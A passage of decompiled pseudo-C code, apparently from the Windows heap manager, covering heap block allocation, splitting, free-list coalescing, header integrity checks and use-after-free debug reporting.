																		 *(_v80 +  *_t315) = _t1822;
																		_t1441 = _v92;
																	}
																}
															}
														}
													}
													L172:
													_t1327 = _v128;
													_t1612 = _v144;
													 *_t1612 = _t1327;
													 *(_t1327 + 4) = _t1612;
													__eflags =  *(_t1441 + 2) & 0x00000008;
													if(( *(_t1441 + 2) & 0x00000008) == 0) {
														L182:
														_v58 = 1;
														goto L200;
													} else {
														_t1328 = E1EFBF5C7(_t1771, _t1441);
														__eflags = _t1328;
														if(_t1328 != 0) {
															goto L182;
														} else {
															E1EFBF113(_t1771, _t1441,  *_t1441 & 0x0000ffff, 1);
															_v58 = 0;
														}
													}
												}
											}
										}
									}
									goto L517;
								}
								_v176 = _t1662;
								_t1053 = _t1662;
								goto L101;
							} else {
								_t1826 =  *_t1793;
								__eflags = _t1826;
								if(_t1826 == 0) {
									goto L95;
								} else {
									_t1441 = _t1826 - 8;
									_v92 = _t1441;
									__eflags =  *(_t1771 + 0x4c);
									if( *(_t1771 + 0x4c) != 0) {
										 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
										__eflags =  *(_t1441 + 3) - ( *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441);
										if(__eflags != 0) {
											_push(_t1464);
											E1F07D646(_t1441, _t1771, _t1441, _t1771, _t1826, __eflags);
										}
									}
									_t1635 =  *(_t1441 + 8);
									_v48 = _t1635;
									_t1378 =  *(_t1441 + 0xc);
									_v32 = _t1378;
									_t1379 =  *_t1378;
									_t1636 =  *((intOrPtr*)(_t1635 + 4));
									__eflags = _t1379 - _t1636;
									if(_t1379 != _t1636) {
										L93:
										E1F085FED(0xd, _t1771, _t1826, _t1636, _t1379, 0);
										goto L94;
									} else {
										__eflags = _t1379 - _t1826;
										if(_t1379 != _t1826) {
											goto L93;
										} else {
											 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - ( *_t1441 & 0x0000ffff);
											_t1757 =  *(_t1771 + 0xb4);
											_v44 = _t1757;
											__eflags = _t1757;
											if(_t1757 != 0) {
												_t1828 =  *_t1441 & 0x0000ffff;
												_v72 = _t1828;
												while(1) {
													_t1641 =  *(_t1757 + 4);
													__eflags = _t1828 - _t1641;
													if(_t1828 < _t1641) {
														break;
													}
													_t1406 =  *_t1757;
													__eflags = _t1406;
													if(_t1406 != 0) {
														_t1757 = _t1406;
														_v44 = _t1757;
														continue;
													} else {
														_t1828 = _t1641 - 1;
														_v72 = _t1828;
													}
													break;
												}
												_v192 = _t1828;
												_v128 =  *_t1441 & 0x0000ffff;
												_t1643 = _t1828 -  *((intOrPtr*)(_t1757 + 0x14));
												_v108 = _t1643;
												__eflags =  *(_t1757 + 8);
												_t1389 = _t1643 + _t1643;
												if( *(_t1757 + 8) == 0) {
													_t1389 = _t1643;
												}
												_t1777 = _t1389 * 4;
												_v80 = _t1777;
												_t1391 =  *((intOrPtr*)(_t1757 + 0x20)) + _t1777;
												_v96 = _t1391;
												_v36 =  *_t1391;
												 *((intOrPtr*)(_t1757 + 0xc)) =  *((intOrPtr*)(_t1757 + 0xc)) - 1;
												_t1393 =  *(_t1757 + 4);
												_t1778 = _t1393 - 1;
												_v144 = _t1778;
												__eflags = _t1828 - _t1778;
												_t1771 = _v124;
												if(_t1828 == _t1778) {
													_t131 = _t1757 + 0x10;
													 *_t131 =  *(_t1757 + 0x10) - 1;
													__eflags =  *_t131;
												}
												_t133 = _t1441 + 8; // 0xddeeddf6
												_t1829 = _t133;
												__eflags = _v36 - _t1829;
												if(_v36 == _t1829) {
													_v196 = _t1393;
													__eflags =  *_t1757;
													if( *_t1757 == 0) {
														_t1393 = _v144;
														_v196 = _t1393;
													}
													_t1830 =  *_t1829;
													_v144 =  *(_t1757 + 0x18);
													__eflags = _v72 - _t1393;
													_t1771 = _v124;
													if(_v72 >= _t1393) {
														_t1394 = _v96;
														__eflags = _t1830 - _v144;
														if(_t1830 == _v144) {
															 *_t1394 = 0;
															goto L87;
														} else {
															 *_t1394 = _t1830;
															goto L82;
														}
														goto L525;
													} else {
														__eflags = _t1830 -  *(_t1757 + 0x18);
														if(_t1830 ==  *(_t1757 + 0x18)) {
															L86:
															 *(_v80 +  *((intOrPtr*)(_t1757 + 0x20))) = 0;
															L87:
															_t168 = _v44 + 0x1c; // 0x0
															 *( *_t168 + (_t1643 >> 5) * 4) =  *( *_t168 + (_t1643 >> 5) * 4) &  !(1 << (_t1643 & 0x0000001f));
														} else {
															_t1455 =  *(_t1830 - 8);
															_v340 = _t1455;
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																_t1455 = _t1455 ^  *(_t1771 + 0x50);
																_v340 = _t1455;
																__eflags = _t1455 >> 0x18 - (_t1455 >> 0x00000010 ^ _t1455 >> 0x00000008 ^ _t1455);
																if(_t1455 >> 0x18 != (_t1455 >> 0x00000010 ^ _t1455 >> 0x00000008 ^ _t1455)) {
																	E1F085FED(3, _t1771, _t1830 - 8, 0, 0, 0);
																	_t1757 = _v44;
																}
															}
															_t1646 = _v128 - (_t1455 & 0x0000ffff);
															__eflags = _t1646;
															_v268 = _t1646;
															if(_t1646 != 0) {
																_t1441 = _v92;
																_t1643 = _v108;
																goto L86;
															} else {
																_t152 = _t1757 + 0x20; // 0xffffffe4
																 *(_v80 +  *_t152) = _t1830;
																_t1441 = _v92;
															}
														}
													}
												}
											}
											L82:
											_t1384 = _v48;
											_t1638 = _v32;
											 *_t1638 = _t1384;
											 *(_t1384 + 4) = _t1638;
											__eflags =  *(_t1441 + 2) & 0x00000008;
											if(( *(_t1441 + 2) & 0x00000008) == 0) {
												L92:
												_v57 = 1;
												L200:
												_t1499 =  *(_t1441 + 2);
												_v59 = _t1499;
												_t1796 = _v116;
												__eflags = _t1796;
												if(_t1796 == 0) {
													__eflags = _t1499 & 0x00000004;
													if((_t1499 & 0x00000004) != 0) {
														_t1818 = ( *_t1441 & 0x0000ffff) * 8 - 0x10;
														_v220 = _t1818;
														__eflags = _t1499 & 0x00000002;
														if((_t1499 & 0x00000002) != 0) {
															__eflags = _t1818 - 4;
															if(_t1818 > 4) {
																_t1818 = _t1818 - 4;
																__eflags = _t1818;
																_v220 = _t1818;
															}
														}
														_t380 = _t1441 + 0x10; // 0x10
														_t1306 = E1F0180A0(_t380, _t1818, 0xfeeefeee);
														_v32 = _t1306;
														__eflags = _t1306 - _t1818;
														if(_t1306 != _t1818) {
															_t1599 =  *[fs:0x30];
															__eflags =  *(_t1599 + 0xc);
															if( *(_t1599 + 0xc) == 0) {
																_push("HEAP: ");
																E1EFBB910();
																_t1843 = _t1839 + 4;
															} else {
																E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																_t1843 = _t1839 + 8;
															}
															_push(_v32 + 0x10 + _v92);
															E1EFBB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _v92);
															_t1839 = _t1843 + 0xc;
															_t1312 =  *[fs:0x30];
															__eflags =  *((char*)(_t1312 + 2));
															if( *((char*)(_t1312 + 2)) == 0) {
																_t1441 = _v92;
															} else {
																 *0x1f0b47a1 = 1;
																_t1441 = _v92;
																 *0x1f0b4100 = _t1441;
																asm("int3");
																 *0x1f0b47a1 = 0;
															}
														}
														_t1796 = _v116;
													}
												}
												_v104 = _t1441;
												__eflags =  *(_t1441 + 2) & 0x00000001;
												if(( *(_t1441 + 2) & 0x00000001) == 0) {
													 *(_t1441 + 2) = _v56;
													_t1500 = _v40;
													_t1679 = ( *_t1441 & 0x0000ffff) - _t1500;
													_v80 = _t1679;
													_v296 = _t1679;
													_t1081 = _t1500 & 0x0000ffff;
													_v32 = _t1081;
													 *_t1441 = _t1081;
													_t1083 = _a8 - _a4;
													_v108 = _t1083;
													__eflags = _t1083 - 0x3f;
													if(_t1083 >= 0x3f) {
														 *(_t1441 + _t1500 * 8 - 4) = _t1083;
														 *(_t1441 + 7) = 0x3f;
													} else {
														 *(_t1441 + 7) = _t1083;
													}
													 *(_t1441 + 3) = 0;
													__eflags = _t1679;
													if(_t1679 == 0) {
														L222:
														_t1501 = _v104;
														_t1797 =  &(_t1501[4]);
														_v88 = _t1797;
														_t1680 = ( *_t1501 & 0x0000ffff) * 8;
														_v140 = _t1680;
														_t1085 =  &(_t1501[3]);
														_v32 = _t1085;
														__eflags = ( *_t1085 & 0x0000003f) - 0x3f;
														if(( *_t1085 & 0x0000003f) == 0x3f) {
															_t1680 = _t1680 + 0xfffffffc;
															__eflags = _t1680;
															_v140 = _t1680;
														}
														__eflags = _v116;
														if(_v116 == 0) {
															__eflags = _v120 & 0x00000008;
															if((_v120 & 0x00000008) == 0) {
																__eflags =  *(_t1771 + 0x40) & 0x00000040;
																if(( *(_t1771 + 0x40) & 0x00000040) == 0) {
																	goto L455;
																} else {
																	_t1449 = _a4;
																	E1F018140(_v88, _t1449 & 0xfffffffc, 0xbaadf00d);
																	goto L456;
																}
																goto L517;
															} else {
																E1F008F40(_t1797, 0, _t1680 - 8);
																L455:
																_t1449 = _a4;
															}
															L456:
															__eflags =  *(_t1771 + 0x40) & 0x00000020;
															if(( *(_t1771 + 0x40) & 0x00000020) != 0) {
																 *((intOrPtr*)(_t1797 + _t1449)) = 0xabababab;
																 *((intOrPtr*)(_t1797 + _t1449 + 4)) = 0xabababab;
																_t1108 = _v104;
																_t845 = _t1108 + 2;
																 *_t845 =  *(_t1108 + 2) | 0x00000004;
																__eflags =  *_t845;
															}
															_t1502 = _v104;
															_t1441 = _t1502 + 3;
															 *_t1441 = 0;
															_t1088 = _t1502 + 2;
															_v48 = _t1088;
															__eflags =  *_t1088 & 0x00000002;
															if(( *_t1088 & 0x00000002) == 0) {
																_t1090 =  *( *[fs:0x30] + 0x68);
																_v324 = _t1090;
																__eflags = _t1090 & 0x00000800;
																if((_t1090 & 0x00000800) == 0) {
																	goto L470;
																} else {
																	_t1798 = _v104;
																	 *_t1441 = E1F069AFE(_t1771, _v120 >> 0x00000012 & 0x000000ff, 0,  *_t1798 & 0x0000ffff, 0);
																}
															} else {
																__eflags =  *_v32 - 4;
																if( *_v32 != 4) {
																	_t1505 = _v104;
																	_t1101 = ( *_t1505 & 0x0000ffff) - 1;
																	__eflags = _t1101;
																	_t1799 = _t1505 + _t1101 * 8;
																} else {
																	_t1799 = _t1502 - 0x10;
																}
																_t1102 = _t1799;
																_v172 = _t1799;
																 *_t1102 = 0;
																 *((intOrPtr*)(_t1102 + 4)) = 0;
																__eflags =  *(_t1771 + 0x40) & 0x08000000;
																if(( *(_t1771 + 0x40) & 0x08000000) != 0) {
																	 *_t1799 = E1EFEFDB9(1, _t1680);
																}
																_t1104 =  *( *[fs:0x30] + 0x68);
																_v320 = _t1104;
																__eflags = _t1104 & 0x00000800;
																if((_t1104 & 0x00000800) == 0) {
																	L470:
																	_t1798 = _v104;
																} else {
																	_t1798 = _v104;
																	 *((short*)(_v172 + 2)) = E1F069AFE(_t1771, _v120 >> 0x00000012 & 0x00000fff, 0,  *_t1798 & 0x0000ffff, 0);
																}
															}
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																 *_t1441 = _t1798[0] ^  *_v48 ^  *_t1798;
																 *_t1798 =  *_t1798 ^  *(_t1771 + 0x50);
															}
														} else {
															__eflags =  *(_t1771 + 0x4c);
															if( *(_t1771 + 0x4c) != 0) {
																_t1518 = _v104;
																_t1518[0] = _t1518[0] ^ _t1518[0] ^  *_t1518;
																 *_t1518 =  *_t1518 ^  *(_t1771 + 0x50);
																__eflags =  *_t1518;
															}
															__eflags = _v49;
															if(_v49 != 0) {
																__eflags =  *(_t1771 + 0x44) & 0x01000000;
																if(( *(_t1771 + 0x44) & 0x01000000) == 0) {
																	 *(_t1771 + 0x22c) =  *(_t1771 + 0x22c) + 1;
																	_t1680 =  *(_t1771 + 0x234);
																	__eflags =  *(_t1771 + 0x22c) - _t1680;
																	if( *(_t1771 + 0x22c) > _t1680) {
																		 *(_t1771 + 0x22c) = 0;
																		_t1517 =  *((intOrPtr*)(_t1771 + 0x1f8)) - ( *(_t1771 + 0x74) << 3);
																		__eflags = _t1517 -  *((intOrPtr*)(_t1771 + 0x248));
																		if(_t1517 >  *((intOrPtr*)(_t1771 + 0x248))) {
																			 *((intOrPtr*)(_t1771 + 0x248)) = _t1517;
																		}
																		 *((intOrPtr*)(_t1771 + 0x24c)) = _t1517;
																	}
																	 *(_t1771 + 0x238) =  *(_t1771 + 0x238) + 1;
																	__eflags =  *(_t1771 + 0x238) - 0x1000;
																	if( *(_t1771 + 0x238) >= 0x1000) {
																		__eflags =  *((char*)(_t1771 + 0xea)) - 2;
																		if( *((char*)(_t1771 + 0xea)) != 2) {
																			L236:
																			_t1125 = 0x10;
																		} else {
																			__eflags =  *((intOrPtr*)(_t1771 + 0x23c)) - 0x10;
																			_t1125 = 0x100;
																			if( *((intOrPtr*)(_t1771 + 0x23c)) <= 0x10) {
																				goto L236;
																			}
																		}
																		__eflags =  *(_t1771 + 0x230) - _t1125;
																		if( *(_t1771 + 0x230) > _t1125) {
																			__eflags = _t1680 - 0x10000;
																			if(_t1680 < 0x10000) {
																				 *(_t1771 + 0x234) = _t1680 + _t1680;
																			}
																		}
																		 *(_t1771 + 0x230) = 0;
																		 *(_t1771 + 0x238) = 0;
																	}
																}
																_t1800 =  *((intOrPtr*)(_t1771 + 0xc8));
																_t452 = _t1800 + 8;
																 *_t452 =  *(_t1800 + 8) + 0xffffffff;
																__eflags =  *_t452;
																if( *_t452 == 0) {
																	 *(_t1800 + 0xc) = 0;
																	_t455 = _t1800 + 4; // 0x4
																	_t1510 = _t455;
																	asm("lock cmpxchg [ecx], edx");
																	_t1441 = 0xfffffffe;
																	__eflags = 0xfffffffe - 0xfffffffe;
																	if(0xfffffffe != 0xfffffffe) {
																		__eflags =  *_t1510 & 0x00000001;
																		if(( *_t1510 & 0x00000001) != 0) {
																			E1F05AA40(_t1800);
																		}
																		_t1118 =  *(_t1800 + 0x10);
																		_v72 = _t1118;
																		__eflags = _t1118;
																		if(_t1118 == 0) {
																			_v72 = E1EFEFEC0(_t1800);
																		}
																		_v252 = 0;
																		while(1) {
																			_t1513 = _t1441 & 0x00000002 | 0x00000001;
																			asm("lock cmpxchg [edi], edx");
																			__eflags = _t1441 - _t1441;
																			_t1771 = _v124;
																			if(_t1441 == _t1441) {
																				break;
																			}
																			E1EFEBAC0(_t1513,  &_v252);
																			_t1441 =  *(_t1800 + 4);
																		}
																		__eflags = _t1513 & 0x00000002;
																		if((_t1513 & 0x00000002) != 0) {
																			E1EFEF300(_t1800, _v72);
																		}
																	}
																}
																_v49 = 0;
															}
															__eflags = _v120 & 0x00000008;
															if((_v120 & 0x00000008) != 0) {
																E1F008F40(_v88, 0, _v140 + 0xfffffff8);
															}
														}
													} else {
														__eflags = _t1679 - 1;
														if(_t1679 != 1) {
															__eflags = _t1796;
															_t1134 = 0 | _t1796 == 0x00000000;
															_v44 = _t1134;
															_v184 = _t1134;
															_t1135 =  *(_t1441 + 6);
															__eflags = _t1135;
															if(_t1135 == 0) {
																_t1519 = _t1771;
																_t1801 = _t1771;
															} else {
																_t1519 = (1 - (_t1135 & 0x000000ff) << 0x10) + (_t1441 & 0xffff0000);
																_t1801 = 1;
															}
															_v224 = _t1519;
															_v48 = _t1679;
															_t1441 = _t1441 + _v40 * 8;
															_v72 = 0;
															 *(_t1441 + 2) = _v59;
															 *(_t1441 + 7) = 0;
															 *(_t1441 + 4) =  *(_t1771 + 0x54) ^ _v32;
															__eflags =  *((intOrPtr*)(_t1519 + 0x18)) - _t1801;
															if( *((intOrPtr*)(_t1519 + 0x18)) != _t1801) {
																_t1143 = (_t1441 - _t1801 >> 0x10) + 1;
																_v32 = _t1143;
																_v128 = _t1143;
																__eflags = _t1143 - 0xfe;
																if(_t1143 >= 0xfe) {
																	E1F085FED(3,  *((intOrPtr*)(_t1519 + 0x18)), _t1441, _t1519, 0, 0);
																	_t1679 = _v80;
																	_t1143 = _v32;
																}
															} else {
																_t1143 = 0;
															}
															_v110 = _t1143;
															 *(_t1441 + 6) = _t1143;
															 *(_t1441 + 3) = 0;
															 *_t1441 = _t1679;
															while(1) {
																_t1802 = _t1441 + _t1679 * 8;
																_t1520 =  *(_t1771 + 0x4c);
																_t1147 = _t1520 >> 0x00000014 &  *(_t1771 + 0x52) ^ _t1802[1];
																__eflags = _t1147 & 0x00000001;
																if((_t1147 & 0x00000001) != 0) {
																	break;
																}
																__eflags = _t1520;
																if(_t1520 != 0) {
																	_t1705 =  *(_t1771 + 0x50) ^  *_t1802;
																	 *_t1802 = _t1705;
																	_t1548 = _t1705 >> 0x00000010 ^ _t1705 >> 0x00000008 ^ _t1705;
																	__eflags = _t1705 >> 0x18 - _t1548;
																	if(__eflags != 0) {
																		_push(_t1548);
																		E1F07D646(_t1441, _t1771, _t1802, _t1771, _t1802, __eflags);
																	}
																}
																_t1688 =  &(_t1802[4]);
																_t1521 =  *_t1688;
																_v32 = _t1521;
																_t1148 = _t1802[6];
																_v48 = _t1148;
																_t1149 =  *_t1148;
																_t1522 =  *((intOrPtr*)(_t1521 + 4));
																__eflags = _t1149 - _t1522;
																if(_t1149 != _t1522) {
																	L448:
																	E1F085FED(0xd, _t1771, _t1688, _t1522, _t1149, 0);
																	goto L449;
																} else {
																	__eflags = _t1149 - _t1688;
																	if(_t1149 != _t1688) {
																		goto L448;
																	} else {
																		 *(_t1771 + 0x74) =  *(_t1771 + 0x74) - ( *_t1802 & 0x0000ffff);
																		_t1690 =  *(_t1771 + 0xb4);
																		__eflags = _t1690;
																		if(_t1690 != 0) {
																			while(1) {
																				_t1205 =  *_t1802 & 0x0000ffff;
																				_t1542 =  *((intOrPtr*)(_t1690 + 4));
																				__eflags = _t1205 - _t1542;
																				if(_t1205 < _t1542) {
																					break;
																				}
																				_t1208 =  *_t1690;
																				__eflags = _t1208;
																				if(_t1208 != 0) {
																					_t1690 = _t1208;
																					continue;
																				} else {
																					_t1205 = _t1542 - 1;
																				}
																				break;
																			}
																			_v240 = _t1205;
																			E1EFD036A(_t1771, _t1690, 1,  &(_t1802[4]), _t1205,  *_t1802 & 0x0000ffff);
																		}
																		_t1154 = _v32;
																		_t1524 = _v48;
																		 *_t1524 = _t1154;
																		 *(_t1154 + 4) = _t1524;
																		__eflags = _t1802[1] & 0x00000008;
																		if((_t1802[1] & 0x00000008) == 0) {
																			L388:
																			_v60 = 1;
																			__eflags = _v44;
																			if(_v44 != 0) {
																				_t1536 = _t1802[1];
																				__eflags = _t1536 & 0x00000004;
																				if((_t1536 & 0x00000004) != 0) {
																					_t1189 = ( *_t1802 & 0x0000ffff) * 8 - 0x10;
																					_v168 = _t1189;
																					__eflags = _t1536 & 0x00000002;
																					if((_t1536 & 0x00000002) != 0) {
																						__eflags = _t1189 - 4;
																						if(_t1189 > 4) {
																							_t1189 = _t1189 - 4;
																							__eflags = _t1189;
																							_v168 = _t1189;
																						}
																					}
																					_t1191 = E1F0180A0( &(_t1802[8]), _t1189, 0xfeeefeee);
																					_v32 = _t1191;
																					__eflags = _t1191 - _v168;
																					if(_t1191 != _v168) {
																						_t1537 =  *[fs:0x30];
																						__eflags =  *(_t1537 + 0xc);
																						if( *(_t1537 + 0xc) == 0) {
																							_push("HEAP: ");
																							E1EFBB910();
																							_t1842 = _t1839 + 4;
																						} else {
																							E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																							_t1842 = _t1839 + 8;
																						}
																						_push(_v32 + 0x10 + _t1802);
																						E1EFBB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1802);
																						_t1839 = _t1842 + 0xc;
																						_t1197 =  *[fs:0x30];
																						__eflags =  *((char*)(_t1197 + 2));
																						if( *((char*)(_t1197 + 2)) != 0) {
																							 *0x1f0b47a1 = 1;
																							 *0x1f0b4100 = _t1802;
																							asm("int3");
																							 *0x1f0b47a1 = 0;
																						}
																						_v44 = _v184;
																					}
																				}
																			}
																			 *(_t1441 + 2) = _t1802[1];
																			_t1526 = _v80 + ( *_t1802 & 0x0000ffff);
																			_v48 = _t1526;
																			_t1157 = _t1526 & 0x0000ffff;
																			_t1691 = _t1526 & 0x0000ffff;
																			__eflags = _t1526 - 0xfe00;
																			if(_t1526 > 0xfe00) {
																				E1EFD0B10(_t1771, _t1441, _t1526);
																			} else {
																				 *_t1441 = _t1526;
																				_t1804 = _t1157;
																				 *(_t1441 + 4 + _t1526 * 8) =  *(_t1771 + 0x54) ^ _t1691;
																				__eflags = _v44;
																				if(_v44 != 0) {
																					 *(_t1441 + 2) =  *(_t1441 + 2) & 0x000000f0;
																					 *(_t1441 + 7) = 0;
																					__eflags =  *(_t1771 + 0x40) & 0x00000040;
																					if(( *(_t1771 + 0x40) & 0x00000040) != 0) {
																						_t793 = _t1441 + 0x10; // 0x10
																						E1F018140(_t793, _t1804 * 8 - 0x10, 0xfeeefeee);
																						_t794 = _t1441 + 2;
																						 *_t794 =  *(_t1441 + 2) | 0x00000004;
																						__eflags =  *_t794;
																					}
																					_t1163 = _t1771 + 0xc0;
																					__eflags =  *(_t1771 + 0xb4);
																					if( *(_t1771 + 0xb4) == 0) {
																						_t1528 =  *_t1163;
																					} else {
																						_t1528 = E1EFC1C0E(_t1771, _t1804);
																						_t1163 = _t1771 + 0xc0;
																					}
																					while(1) {
																						__eflags = _t1163 - _t1528;
																						if(_t1163 == _t1528) {
																							break;
																						}
																						__eflags =  *(_t1771 + 0x4c);
																						if( *(_t1771 + 0x4c) == 0) {
																							_t1696 =  *(_t1528 - 8);
																						} else {
																							_t1696 =  *(_t1528 - 8);
																							_v100 = _t1696;
																							__eflags =  *(_t1771 + 0x4c) & _t1696;
																							if(( *(_t1771 + 0x4c) & _t1696) != 0) {
																								_t1696 = _t1696 ^  *(_t1771 + 0x50);
																								_v100 = _t1696;
																							}
																						}
																						_v130 = _t1696;
																						__eflags = _t1804 - (_t1696 & 0x0000ffff);
																						if(_t1804 > (_t1696 & 0x0000ffff)) {
																							_t1528 =  *_t1528;
																							_t1163 = _t1771 + 0xc0;
																							continue;
																						}
																						break;
																					}
																					_t810 = _t1441 + 8; // 0x8
																					_t1805 = _t810;
																					_t1164 =  *((intOrPtr*)(_t1528 + 4));
																					_t1693 =  *_t1164;
																					__eflags = _t1693 - _t1528;
																					if(_t1693 != _t1528) {
																						__eflags = 0;
																						E1F085FED(0xd, 0, _t1528, 0, _t1693, 0);
																					} else {
																						 *_t1805 = _t1528;
																						 *((intOrPtr*)(_t1805 + 4)) = _t1164;
																						 *_t1164 = _t1805;
																						 *((intOrPtr*)(_t1528 + 4)) = _t1805;
																					}
																					 *(_t1771 + 0x74) =  *(_t1771 + 0x74) + ( *_t1441 & 0x0000ffff);
																					_t1695 =  *(_t1771 + 0xb4);
																					__eflags = _t1695;
																					if(_t1695 == 0) {
																						goto L371;
																					} else {
																						_t1530 =  *_t1441 & 0x0000ffff;
																						while(1) {
																							__eflags = _t1530 -  *((intOrPtr*)(_t1695 + 4));
																							if(_t1530 <  *((intOrPtr*)(_t1695 + 4))) {
																								break;
																							}
																							_t1171 =  *_t1695;
																							__eflags = _t1171;
																							if(_t1171 != 0) {
																								_t1695 = _t1171;
																								continue;
																							} else {
																								_t1172 =  *((intOrPtr*)(_t1695 + 4)) - 1;
																								__eflags = _t1172;
																							}
																							L444:
																							_v248 = _t1172;
																							goto L370;
																						}
																						_t1172 = _t1530;
																						goto L444;
																					}
																				} else {
																					 *(_t1441 + 2) = 0;
																					 *(_t1441 + 7) = 0;
																					_t1180 = _t1771 + 0xc0;
																					__eflags =  *(_t1771 + 0xb4);
																					if( *(_t1771 + 0xb4) == 0) {
																						_t1533 =  *_t1180;
																					} else {
																						_t1533 = E1EFC1C0E(_t1771, _t1804);
																						_t1180 = _t1771 + 0xc0;
																					}
																					while(1) {
																						__eflags = _t1180 - _t1533;
																						if(_t1180 == _t1533) {
																							break;
																						}
																						__eflags =  *(_t1771 + 0x4c);
																						if( *(_t1771 + 0x4c) == 0) {
																							_t1700 =  *(_t1533 - 8);
																						} else {
																							_t1700 =  *(_t1533 - 8);
																							_v84 = _t1700;
																							__eflags =  *(_t1771 + 0x4c) & _t1700;
																							if(( *(_t1771 + 0x4c) & _t1700) != 0) {
																								_t1700 = _t1700 ^  *(_t1771 + 0x50);
																								_v84 = _t1700;
																							}
																						}
																						_v132 = _t1700;
																						__eflags = _t1804 - (_t1700 & 0x0000ffff);
																						if(_t1804 > (_t1700 & 0x0000ffff)) {
																							_t1533 =  *_t1533;
																							_t1180 = _t1771 + 0xc0;
																							continue;
																						}
																						break;
																					}
																					_t774 = _t1441 + 8; // 0x8
																					_t1805 = _t774;
																					_t1181 =  *((intOrPtr*)(_t1533 + 4));
																					_t1698 =  *_t1181;
																					__eflags = _t1698 - _t1533;
																					if(_t1698 != _t1533) {
																						__eflags = 0;
																						E1F085FED(0xd, 0, _t1533, 0, _t1698, 0);
																					} else {
																						 *_t1805 = _t1533;
																						 *((intOrPtr*)(_t1805 + 4)) = _t1181;
																						 *_t1181 = _t1805;
																						 *((intOrPtr*)(_t1533 + 4)) = _t1805;
																					}
																					 *(_t1771 + 0x74) =  *(_t1771 + 0x74) + ( *_t1441 & 0x0000ffff);
																					_t1695 =  *(_t1771 + 0xb4);
																					__eflags = _t1695;
																					if(_t1695 == 0) {
																						L371:
																						__eflags =  *(_t1771 + 0x4c);
																						if( *(_t1771 + 0x4c) != 0) {
																							 *(_t1441 + 3) =  *(_t1441 + 2) ^  *(_t1441 + 1) ^  *_t1441;
																							 *_t1441 =  *_t1441 ^  *(_t1771 + 0x50);
																						}
																						goto L447;
																					} else {
																						_t1530 =  *_t1441 & 0x0000ffff;
																						while(1) {
																							__eflags = _t1530 -  *((intOrPtr*)(_t1695 + 4));
																							if(_t1530 <  *((intOrPtr*)(_t1695 + 4))) {
																								break;
																							}
																							_t1184 =  *_t1695;
																							__eflags = _t1184;
																							if(_t1184 != 0) {
																								_t1695 = _t1184;
																								continue;
																							} else {
																								_t1172 =  *((intOrPtr*)(_t1695 + 4)) - 1;
																								__eflags = _t1172;
																							}
																							L421:
																							_v244 = _t1172;
																							L370:
																							E1EFC1B5D(_t1771, _t1695, 1, _t1805, _t1172, _t1530);
																							goto L371;
																						}
																						_t1172 = _t1530;
																						goto L421;
																					}
																				}
																				goto L525;
																			}
																			L447:
																			_v109 = 1;
																			_v59 = 0;
																			goto L222;
																		} else {
																			_t1202 = E1EFBF5C7(_t1771, _t1802);
																			__eflags = _t1202;
																			if(_t1202 != 0) {
																				goto L388;
																			} else {
																				E1EFBF113(_t1771, _t1802,  *_t1802 & 0x0000ffff, 1);
																				L449:
																				_v60 = 0;
																				__eflags = _v72;
																				if(_v72 != 0) {
																					_v109 = 0;
																					 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc000003c;
																					_t1803 =  *[fs:0x18];
																					_v316 = _t1803;
																					 *((intOrPtr*)(_t1803 + 0x34)) = E1EFEABA0(0xc000003c);
																				} else {
																					_v72 = 1;
																					_t1679 = _v80;
																					continue;
																				}
																			}
																		}
																	}
																}
																goto L517;
															}
															_t1708 = _t1679 & 0x0000ffff;
															_v40 = _t1708;
															_t1802[2] =  *(_t1771 + 0x54) ^ _t1708;
															__eflags = _v44;
															if(_v44 != 0) {
																 *(_t1441 + 2) =  *(_t1441 + 2) & 0x000000f0;
																 *(_t1441 + 7) = 0;
																__eflags =  *(_t1771 + 0x40) & 0x00000040;
																if(( *(_t1771 + 0x40) & 0x00000040) != 0) {
																	_t676 = _t1441 + 0x10; // 0x10
																	E1F018140(_t676, _t1708 * 8 - 0x10, 0xfeeefeee);
																	_t677 = _t1441 + 2;
																	 *_t677 =  *(_t1441 + 2) | 0x00000004;
																	__eflags =  *_t677;
																	_t1708 = _v40;
																}
																_t1806 = _t1771 + 0xc0;
																__eflags =  *(_t1771 + 0xb4);
																if( *(_t1771 + 0xb4) == 0) {
																	_t1550 =  *_t1806;
																} else {
																	_t1550 = E1EFC1C0E(_t1771, _t1708);
																}
																while(1) {
																	__eflags = _t1806 - _t1550;
																	if(_t1806 == _t1550) {
																		break;
																	}
																	__eflags =  *(_t1771 + 0x4c);
																	if( *(_t1771 + 0x4c) == 0) {
																		_t1711 =  *(_t1550 - 8);
																	} else {
																		_t1711 =  *(_t1550 - 8);
																		_v76 = _t1711;
																		__eflags =  *(_t1771 + 0x4c) & _t1711;
																		if(( *(_t1771 + 0x4c) & _t1711) != 0) {
																			_t1711 = _t1711 ^  *(_t1771 + 0x50);
																			_v76 = _t1711;
																		}
																	}
																	_v134 = _t1711;
																	__eflags = _v40 - (_t1711 & 0x0000ffff);
																	if(_v40 > (_t1711 & 0x0000ffff)) {
																		_t1550 =  *_t1550;
																		continue;
																	}
																	break;
																}
																_t693 = _t1441 + 8; // 0x8
																_t1805 = _t693;
																_t1216 =  *((intOrPtr*)(_t1550 + 4));
																_t1709 =  *_t1216;
																__eflags = _t1709 - _t1550;
																if(_t1709 != _t1550) {
																	__eflags = 0;
																	E1F085FED(0xd, 0, _t1550, 0, _t1709, 0);
																} else {
																	 *_t1805 = _t1550;
																	 *((intOrPtr*)(_t1805 + 4)) = _t1216;
																	 *_t1216 = _t1805;
																	 *((intOrPtr*)(_t1550 + 4)) = _t1805;
																}
																 *(_t1771 + 0x74) =  *(_t1771 + 0x74) + ( *_t1441 & 0x0000ffff);
																_t1695 =  *(_t1771 + 0xb4);
																__eflags = _t1695;
																if(_t1695 != 0) {
																	_t1530 =  *_t1441 & 0x0000ffff;
																	while(1) {
																		__eflags = _t1530 -  *((intOrPtr*)(_t1695 + 4));
